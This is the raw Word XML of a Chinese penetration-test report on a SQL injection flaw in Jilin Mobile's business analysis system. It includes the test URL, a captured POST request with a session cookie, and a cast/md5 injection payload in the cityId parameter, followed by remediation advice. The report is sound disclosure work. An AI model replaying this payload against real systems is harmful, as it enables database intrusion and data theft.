          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D228DD1" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/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>吉林移动-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>经营分析系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A78510" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>问题描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现吉林移动-经营分析系统存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A86D22" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FA5A3" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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http://10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=getKpiDataInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40325AD2" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D306D3" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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测试发现吉林经营分析系统存在SQL注入漏洞，可在4A登录后进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9B301" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>及说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17150BDA" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：打开http://10.255.133.186:8888/portal/pages/portal/home/home.jsp,接口自动发送post请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D745F8C" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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114300" distR="114300" wp14:anchorId="3FD704C8" wp14:editId="36DF3E67">
            <wp:extent cx="5266690" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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23DED" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638E6C2F" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D94507" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0000FF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截图2：SQL注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2D69D5C7" wp14:editId="503AFD65">
            <wp:extent cx="5269230" cy="3060065"/>
            <wp:effectExtent l="0" t="0" r="7620" b="698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85E5" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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相关数据包如下：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221" w14:paraId="77835438" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AEB1E7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SQL注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63EBD3BE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POST /portal/pages/frame/portal/home/homeAction.jsp?eaction=getKpiDataInfo HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6926FE48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Host: 10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F5FD54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User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53044BF1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Content-Length: 132</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66E240E1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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DFD9E6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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B6FE14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lastRenderedPageBreak/>
              <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653E47F0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Cookie: JSESSIONID=77AFA9613C66F34F328BC82100E4D7F5.portal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215ABA00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Origin: http://10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309E567C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Referer: http://10.255.133.186:8888/portal//pages/portal/home/home.jsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4568ADA3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Sec-Gpc: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDA10D8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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C50503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Accept-Encoding: gzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5E1610" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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</w:p>
          <w:p w14:paraId="008132B7" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="afb"/>
              <w:spacing w:line="360" w:lineRule="auto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areaId=9999&amp;cityId=9999%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281025465904%29as%2F%2A%2A%2Fint%29%29%3E%270&amp;dayId=20250424</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0442DBF7" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FD35E0" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>程度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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74088D1E" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：攻击者可以利用该漏洞对获取数据库的敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>甚至通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>os-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>拿到服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AA154" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb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>整改建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABB682" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.使用预编译语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D856C66" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.检查数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928E0E2" w14:textId="7A3B18F6" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.使用安全函数</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009562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0E2D1" w14:textId="77777777" w:rsidR="009724B4" w:rsidRDefault="009724B4" w:rsidP="002A7542">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="343491A7" w14:textId="77777777" w:rsidR="009724B4" w:rsidRDefault="009724B4" w:rsidP="002A75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FC03B" w14:textId="77777777" w:rsidR="009724B4" w:rsidRDefault="009724B4" w:rsidP="002A7542">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40EE0727" w14:textId="77777777" w:rsidR="009724B4" w:rsidRDefault="009724B4" w:rsidP="002A75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40CA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A140CA9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color w:val="000000"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1434" w:hanging="1008"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="6"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2003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7D65E8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37D65E8A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="20"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="25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ind w:left="3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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A9269AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A9269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13F26BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="613F26BB"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="10"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="44"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="576"/>
        </w:tabs>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="NERCIS-"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1288"/>
        </w:tabs>
        <w:ind w:left="1288" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="30"/>
        <w:szCs w:val="30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 w16cid:durableId="1449741335">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1189224401">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1757555032">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="17809047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Y2OTMyNGMyN2EzYzcxNDNmMDdlYzA4ZmI3ZmEyMmYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="001F12A6"/>
    <w:rsid w:val="8BE76D8E"/>
    <w:rsid w:val="8F7F46AF"/>
    <w:rsid w:val="96FF0F1E"/>
    <w:rsid w:val="9B1E9DD7"/>
    <w:rsid w:val="9CDFC46C"/>
    <w:rsid w:val="9EDA7B9D"/>
    <w:rsid w:val="A7BF998B"/>
    <w:rsid w:val="A97EF767"/>
    <w:rsid w:val="AE6E5BF6"/>
    <w:rsid w:val="AE7FBDA5"/>
    <w:rsid w:val="B34BE5AC"/>
    <w:rsid w:val="B63F385A"/>
    <w:rsid w:val="B7BB5CE4"/>
    <w:rsid w:val="B7EB9C49"/>
    <w:rsid w:val="B7FFADDD"/>
    <w:rsid w:val="BB7FED33"/>
    <w:rsid w:val="BDDBD7FE"/>
    <w:rsid w:val="BF37CD68"/>
    <w:rsid w:val="BFE328F0"/>
    <w:rsid w:val="BFEE209F"/>
    <w:rsid w:val="C7F792EC"/>
    <w:rsid w:val="CF931493"/>
    <w:rsid w:val="D5F25DC7"/>
    <w:rsid w:val="D665E544"/>
    <w:rsid w:val="D707041C"/>
    <w:rsid w:val="D7F7092E"/>
    <w:rsid w:val="D7F7F4B9"/>
    <w:rsid w:val="DB85EB0D"/>
    <w:rsid w:val="DB9C1ED3"/>
    <w:rsid w:val="DBFF160C"/>
    <w:rsid w:val="DF2F2B54"/>
    <w:rsid w:val="DF97B662"/>
    <w:rsid w:val="DFE56609"/>
    <w:rsid w:val="DFFF8FD8"/>
    <w:rsid w:val="E7D6A7E2"/>
    <w:rsid w:val="EB3FE56E"/>
    <w:rsid w:val="EDDF9BDC"/>
    <w:rsid w:val="EEBE9475"/>
    <w:rsid w:val="EF7F3514"/>
    <w:rsid w:val="EFB132B4"/>
    <w:rsid w:val="EFF1F26D"/>
    <w:rsid w:val="EFFFA813"/>
    <w:rsid w:val="F1D77BA2"/>
    <w:rsid w:val="F3FAC685"/>
    <w:rsid w:val="F70C1287"/>
    <w:rsid w:val="F73D21EE"/>
    <w:rsid w:val="F7BE1985"/>
    <w:rsid w:val="F7FC07BB"/>
    <w:rsid w:val="F7FDCDC2"/>
    <w:rsid w:val="F9F93AC9"/>
    <w:rsid w:val="FAF376F4"/>
    <w:rsid w:val="FAFBEB29"/>
    <w:rsid w:val="FBBF2878"/>
    <w:rsid w:val="FBFF6384"/>
    <w:rsid w:val="FC7D6CC0"/>
    <w:rsid w:val="FCD8D87D"/>
    <w:rsid w:val="FD67214F"/>
    <w:rsid w:val="FDBFEDDA"/>
    <w:rsid w:val="FE7E0673"/>
    <w:rsid w:val="FECB1764"/>
    <w:rsid w:val="FEF7494D"/>
    <w:rsid w:val="FEFA0994"/>
    <w:rsid w:val="FF7F90D6"/>
    <w:rsid w:val="FF8FBF75"/>
    <w:rsid w:val="FFAFA5A5"/>
    <w:rsid w:val="FFDF12B3"/>
    <w:rsid w:val="FFF74B0B"/>
    <w:rsid w:val="FFFDC4B2"/>
    <w:rsid w:val="FFFFE3B5"/>
    <w:rsid w:val="000029E6"/>
    <w:rsid w:val="00002A11"/>
    <w:rsid w:val="00002F0A"/>
    <w:rsid w:val="00004E3A"/>
    <w:rsid w:val="00006117"/>
    <w:rsid w:val="0000625D"/>
    <w:rsid w:val="00007B0D"/>
    <w:rsid w:val="000101E8"/>
    <w:rsid w:val="00010784"/>
    <w:rsid w:val="00010A4B"/>
    <w:rsid w:val="00011DB8"/>
    <w:rsid w:val="00013CBC"/>
    <w:rsid w:val="00014CD9"/>
    <w:rsid w:val="0001500C"/>
    <w:rsid w:val="00015C92"/>
    <w:rsid w:val="000210D6"/>
    <w:rsid w:val="0002129A"/>
    <w:rsid w:val="000227C2"/>
    <w:rsid w:val="000237FE"/>
    <w:rsid w:val="00024A0F"/>
    <w:rsid w:val="00025732"/>
    <w:rsid w:val="00030A4D"/>
    <w:rsid w:val="00031622"/>
    <w:rsid w:val="00034645"/>
    <w:rsid w:val="00035B17"/>
    <w:rsid w:val="00036EC5"/>
    <w:rsid w:val="0004143E"/>
    <w:rsid w:val="00043053"/>
    <w:rsid w:val="000447D1"/>
    <w:rsid w:val="000451F1"/>
    <w:rsid w:val="000538CE"/>
    <w:rsid w:val="00054403"/>
    <w:rsid w:val="00054E8E"/>
    <w:rsid w:val="00055500"/>
    <w:rsid w:val="00056CA3"/>
    <w:rsid w:val="000575B6"/>
    <w:rsid w:val="000602C4"/>
    <w:rsid w:val="000620A8"/>
    <w:rsid w:val="000650A6"/>
    <w:rsid w:val="0007072D"/>
    <w:rsid w:val="000716A1"/>
    <w:rsid w:val="00071BF1"/>
    <w:rsid w:val="00072AB6"/>
    <w:rsid w:val="000731AC"/>
    <w:rsid w:val="000736AA"/>
    <w:rsid w:val="0007384E"/>
    <w:rsid w:val="00075647"/>
    <w:rsid w:val="00077FE1"/>
    <w:rsid w:val="000820A8"/>
    <w:rsid w:val="000857E4"/>
    <w:rsid w:val="00090F80"/>
    <w:rsid w:val="00092287"/>
    <w:rsid w:val="00092AFF"/>
    <w:rsid w:val="000942AF"/>
    <w:rsid w:val="000A2408"/>
    <w:rsid w:val="000A36A9"/>
    <w:rsid w:val="000A39A1"/>
    <w:rsid w:val="000A473C"/>
    <w:rsid w:val="000A4BE8"/>
    <w:rsid w:val="000A5D30"/>
    <w:rsid w:val="000A6DE3"/>
    <w:rsid w:val="000B0AD0"/>
    <w:rsid w:val="000B0DD8"/>
    <w:rsid w:val="000B1989"/>
    <w:rsid w:val="000B3140"/>
    <w:rsid w:val="000B314C"/>
    <w:rsid w:val="000B4036"/>
    <w:rsid w:val="000B4A2C"/>
    <w:rsid w:val="000B5CC5"/>
    <w:rsid w:val="000B7372"/>
    <w:rsid w:val="000C016F"/>
    <w:rsid w:val="000C1335"/>
    <w:rsid w:val="000C26DD"/>
    <w:rsid w:val="000C4DF9"/>
    <w:rsid w:val="000C5A65"/>
    <w:rsid w:val="000C7AEF"/>
    <w:rsid w:val="000D1D6F"/>
    <w:rsid w:val="000D3F55"/>
    <w:rsid w:val="000E0CCF"/>
    <w:rsid w:val="000E1391"/>
    <w:rsid w:val="000E4ADE"/>
    <w:rsid w:val="000E705A"/>
    <w:rsid w:val="000E7F78"/>
    <w:rsid w:val="000F7B6C"/>
    <w:rsid w:val="00100203"/>
    <w:rsid w:val="00100954"/>
    <w:rsid w:val="00102CC8"/>
    <w:rsid w:val="00103201"/>
    <w:rsid w:val="001065EE"/>
    <w:rsid w:val="00107928"/>
    <w:rsid w:val="001103E8"/>
    <w:rsid w:val="00110FCD"/>
    <w:rsid w:val="00111C80"/>
    <w:rsid w:val="00112167"/>
    <w:rsid w:val="001170FF"/>
    <w:rsid w:val="00117CCF"/>
    <w:rsid w:val="00120A00"/>
    <w:rsid w:val="00121196"/>
    <w:rsid w:val="001260B8"/>
    <w:rsid w:val="001275A5"/>
    <w:rsid w:val="0013085E"/>
    <w:rsid w:val="001309AD"/>
    <w:rsid w:val="00131658"/>
    <w:rsid w:val="00133C98"/>
    <w:rsid w:val="00133F22"/>
    <w:rsid w:val="00136CBB"/>
    <w:rsid w:val="00137040"/>
    <w:rsid w:val="00152F6E"/>
    <w:rsid w:val="001563A1"/>
    <w:rsid w:val="00161FC8"/>
    <w:rsid w:val="00163C06"/>
    <w:rsid w:val="001661F2"/>
    <w:rsid w:val="001675E6"/>
    <w:rsid w:val="00167801"/>
    <w:rsid w:val="001710C1"/>
    <w:rsid w:val="00171C3A"/>
    <w:rsid w:val="001734E4"/>
    <w:rsid w:val="001805EA"/>
    <w:rsid w:val="00180648"/>
    <w:rsid w:val="001876C8"/>
    <w:rsid w:val="001904C1"/>
    <w:rsid w:val="001904DD"/>
    <w:rsid w:val="00190EA9"/>
    <w:rsid w:val="00191E84"/>
    <w:rsid w:val="00192C0A"/>
    <w:rsid w:val="00195E04"/>
    <w:rsid w:val="00197220"/>
    <w:rsid w:val="001A03E4"/>
    <w:rsid w:val="001A1477"/>
    <w:rsid w:val="001A1729"/>
    <w:rsid w:val="001A2230"/>
    <w:rsid w:val="001A2843"/>
    <w:rsid w:val="001A2E1E"/>
    <w:rsid w:val="001A4F71"/>
    <w:rsid w:val="001A5D30"/>
    <w:rsid w:val="001A5E90"/>
